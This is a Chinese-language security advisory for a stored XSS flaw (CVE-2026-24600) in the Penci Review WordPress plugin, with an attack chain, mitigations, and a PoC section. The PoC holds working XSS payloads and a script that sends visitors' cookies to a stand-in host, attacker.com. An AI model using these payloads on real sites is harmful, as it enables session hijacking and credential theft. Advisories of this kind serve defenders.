CVE-2026-24600 Penci Review插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-24600

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PenciDesign Penci Review WordPress插件

漏洞概述

CVE-2026-24600是WordPress插件Penci Review中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞由Patchstack安全团队的审计人员[email protected]发现并报告。Penci Review是一款流行的WordPress评论插件，被广泛应用于各类网站以增强用户评论体验。

该漏洞的根本原因在于应用程序在生成Web页面时未能正确对用户输入进行中和处理。攻击者可以利用此漏洞在受影响的WordPress网站上注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端（数据库中），所有访问包含恶意内容页面的用户都会受到攻击。

攻击者仅需拥有低权限账户（如订阅者角色）即可实施攻击，且攻击成功需要目标用户的交互行为（如查看评论）。根据CVSS 3.1评分6.5（中危）来看，该漏洞对机密性、完整性和可用性均造成较低程度的影响，但因其存储特性和广泛的插件使用量，仍需引起高度重视。

受影响的版本为Penci Review从n/a版本到3.5及以下所有版本。建议所有使用该插件的网站管理员立即采取修复措施，避免遭受潜在的安全威胁。

技术细节

该漏洞属于典型的存储型跨站脚本（Stored XSS）漏洞，编号为CWE-79（Cross-site Scripting）。漏洞产生的根本原因是Penci Review插件在处理用户提交的评论内容时，未能对特殊字符进行充分的输入验证和输出编码。

具体技术细节如下：

1. **输入验证不足**：插件在接受用户评论输入时，未实施严格的输入过滤机制，允许攻击者提交包含HTML标签和JavaScript事件处理器属性的内容。

2. **输出编码缺失**：当其他用户访问包含恶意评论的页面时，插件直接将该内容输出到HTML页面中，而没有对特殊字符进行HTML实体编码（如将<转换为<，将>转换为>）。

3. **存储型特性**：恶意脚本被永久存储在WordPress数据库的评论表中，每当页面加载时都会从数据库读取并执行，形成持续的威胁。

4. **利用方式**：攻击者可以通过在评论字段中插入恶意Payload，如：
- 在HTML标签属性中注入事件处理器（如onerror、onload等）
- 利用<script>标签直接嵌入JavaScript代码
- 利用<a>标签的javascript:伪协议

5. **攻击影响**：成功利用此漏洞可导致会话劫持、凭据窃取、恶意重定向、网页篡改等严重后果。攻击者可冒充合法用户执行操作，窃取敏感信息或在网站上植入钓鱼内容。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的WordPress版本和Penci Review插件版本，确认版本 <= 3.5

STEP 2

步骤2：账户准备

攻击者注册一个低权限WordPress账户（订阅者角色），或利用已有低权限账户登录

STEP 3

步骤3：恶意Payload注入

攻击者在Penci Review评论功能中注入包含恶意JavaScript代码的Payload，如<img src=x onerror=alert(document.cookie)>

STEP 4

步骤4：数据持久化

恶意Payload被存储到WordPress数据库的评论表中，形成持久性威胁

STEP 5

步骤5：受害者访问

当管理员或其他用户访问包含恶意评论的页面时，浏览器会执行存储的JavaScript代码

STEP 6

步骤6：攻击生效

恶意脚本在受害者浏览器中执行，可窃取会话Cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-24600 Stored XSS PoC -->
<!-- Target: Penci Review WordPress Plugin <= 3.5 -->
<!-- Author: Security Researcher -->

<!-- Basic Stored XSS Payload -->
<script>alert('XSS');</script>

<!-- Event Handler Based XSS Payload -->
<img src=x onerror=alert(document.cookie)>

<!-- DOM-based XSS Payload -->
<svg/onload=alert('Stored XSS')>

<!-- Advanced Cookie Stealing Payload -->
<script>
  var img = document.createElement('img');
  img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
  document.body.appendChild(img);
</script>

<!-- Stored XSS in Comment Field -->
<!-- Steps to reproduce: -->
<!-- 1. Login to WordPress with low-privilege account -->
<!-- 2. Navigate to a post with Penci Review enabled -->
<!-- 3. Submit a review/comment with the XSS payload above -->
<!-- 4. Wait for admin or user to view the page -->
<!-- 5. XSS payload will execute in victim's browser -->

影响范围

Penci Review <= 3.5（所有版本）

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）限制或禁用Penci Review的评论功能；2）实施严格的访问控制，仅允许受信任用户发表评论；3）部署Web应用防火墙（WAF）规则过滤恶意请求；4）使用WordPress安全插件的虚拟补丁功能；5）加强对评论内容的审核机制，人工审查所有用户提交的评论；6）考虑暂时禁用该插件，直至官方发布安全更新。